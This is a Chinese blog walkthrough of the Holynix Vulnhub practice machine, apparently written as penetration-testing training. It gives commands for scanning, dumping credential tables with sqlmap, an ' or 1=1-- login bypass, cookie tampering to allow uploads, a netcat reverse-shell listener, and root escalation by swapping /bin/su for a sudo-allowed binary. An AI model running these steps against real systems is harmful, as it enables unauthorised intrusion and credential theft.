holynix靶机复现

最新推荐文章于 2024-08-04 18:07:56 发布
最新推荐文章于 2024-08-04 18:07:56 发布
阅读量351 收藏 3
点赞数 4
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52956666/article/details/140805399
版权

查看靶机的MAC地址

修改靶机的MAC地址为 00:0c:29:bc:05:de

使用nmap进行端口扫描

nmap 192.168.112.0/24

发现靶机地址,并开放80端口

使用dirsearch进行目录扫描

dirsearch -u 192.168.112.131

浏览器访问

点击login

测试SQL注入

在username和password里面输入单引号

出现sql报错语句,说明存在sql注入

测试数据库名

python sqlmap.py -r 111.txt -dbs --batch

测试client库

测试表名

python sqlmap.py -r 111.txt -D clients --tables --batch

测试字段内容

python sqlmap.py -r 111.txt -D clients --dump --batch

发现信息内容

第二个表无有价值信息

测试creds库

测试表名

python sqlmap.py -r 111.txt -D creds --tables --batch

测试字段内容

python sqlmap.py -r 111.txt -D creds --dump --batch

发现信息

发现用户名和密码信息

测试mysql库

测试表名

python sqlmap.py -r 111.txt -D mysql --tables --batch

测试字段内容

python sqlmap.py -r 111.txt -D mysql -T user --dump --batch

使用万能密码登录

'or 1=1--

测试XSS漏洞

输入<img src=x>

发现存在XSS漏洞

测试上传文件

发现不允许上传

将cookie中的uid改为2

再次上传发现成功

在用户的家目录找到了上传的文件

获取shell

修改ip为192.168.112.128

port为1234

上传shell.tar.gz

进行监听

nc -lvnp 1234

提权

查看当前用户,发现为低权限用户

使用 sudo -l 查看当前可执行的免sudo权限

输入 sudo mv /bin/tar /bin/tar.orgi

sudo mv /bin/su /bin/tar

sudo tar

将三个免密的权限随便改个名字

将提权的改为免密的名字

执行,发现提权成功

CcHKer
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机精讲之Holynix
m0_63285023的博客
04-17 666
找不到ip就设置两个网络适配器再添加一个NAT。
holynix-v1靶机
hqy250019的博客
07-12 418
抓包,尝试水平越权,把id改为其他的,因为刚刚在username中看到很多用户。点击login,发现用户登录,使用弱口令测试一下,登陆不上,测试SQL。点击Message Board,发现留言板,测试xss。点击Security,F12发现可能存在文件包含。修改时在关机状态下修改,修改好后打开。访问192.168.111.148。点击Directory,发现有用户。上传页面有个上传压缩包,自动解压。nc -lvnp 5555监听。上传一个php文件,不让上传。发现上传成功,并且用户也变了。
Vulnhub靶机HOLYNIX_ V1
LainWith的博客
12-23 2300
Holynix(此系列共2台)发布日期:2010年11月27日难度:中运行环境:VMware Workstation目标:取得 root 权限补充:需要手工设置靶机的MAC为00:0c:29:bc:05:de,然后重启靶机才能获取到靶机IP主机发现端口扫描+漏洞扫描万能密码文件包含漏洞mv提权。
holynix靶机渗透测试
weixin_58786230的博客
07-29 485
【代码】holynix靶机渗透测试。
vulnhub靶场/holynix
qq_45230030的博客
04-16 1018
分享一下之前vulnhub的打靶记录
holynix靶机
zdd1453691081的博客
07-12 162
【代码】holynix靶机
HOLYNIX: V1靶机
weixin_71232352的博客
07-12 292
【代码】HOLYNIX: V1靶机
IMF靶机复现
weixin_43999483的博客
02-23 426
IMF靶机复现 发现靶机IP:192.168.8.198 搜寻开放端口,发现除了80端口外,没发现其他端口。 使用dirb 撞靶机的子域名 dirb http://192.168.8.198 并没有找到有用的域名 F12手动查找Flag 在contact.php中找到注释的Flag1 搜寻== 发现后三行乱码 疑似Flag,组合base64解码得到 对flag2的内容进行再解码,得到 : 可能是用户名密码或者是子域名,猜测得到网址192.168.8.198/imfadministrator
Tomato靶机复现过程
weixin_67729650的博客
08-04 1063
这里我们看到了有一个用户Tomato的uid为1000(我们linux主机创建的第一个用户的uid为1000),且它的shell为/bin/bash(说明可以分配终端),再结合我们前面扫到的2211远程连接端口,说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址,就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了,那不就拿下了?紧接着我们可以试试我们学过的文件包含的漏洞知识,去试试。
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8450
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
厦门工学院在广东2021-2024各专业最低录取分数及位次表.pdf
最新发布
09-07
全国各大学在广东2021-2024各专业最低录取分数及位次表
基于深度学习的目标检测研究综述.pdf
09-07
基于深度学习的目标检测研究综述.pdf
3_9月6日 上午11点27分.m4a..mp3
09-07
3_9月6日 上午11点27分.m4a..mp3
2023-04-06-项目笔记 - 第二百四十九阶段 - 4.4.2.247全局变量的作用域-247 -2025.09.07
09-07
2023-04-06-项目笔记-第二百四十九阶段-课前小分享_小分享1.坚持提交gitee 小分享2.作业中提交代码 小分享3.写代码注意代码风格 4.3.1变量的使用 4.4变量的作用域与生命周期 4.4.1局部变量的作用域 4.4.2全局变量的作用域 4.4.2.1全局变量的作用域_1 4.4.2.247局变量的作用域_247- 2024-09-07
ios系统资源管理知识详解
09-07
ios系统资源管理知识详解
Kioptrix2靶场复现:SQL注入到权限提升详解
"Kioptrix2-WalkThrough 靶机复现文档详细记录了在Kali Linux环境下对Kioptrix Level 1-1.2靶机的渗透测试过程,包括信息收集、漏洞利用和权限提升等关键步骤。靶机主要开放了MySQL、SSH和HTTP服务,通过SQL注入攻破...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值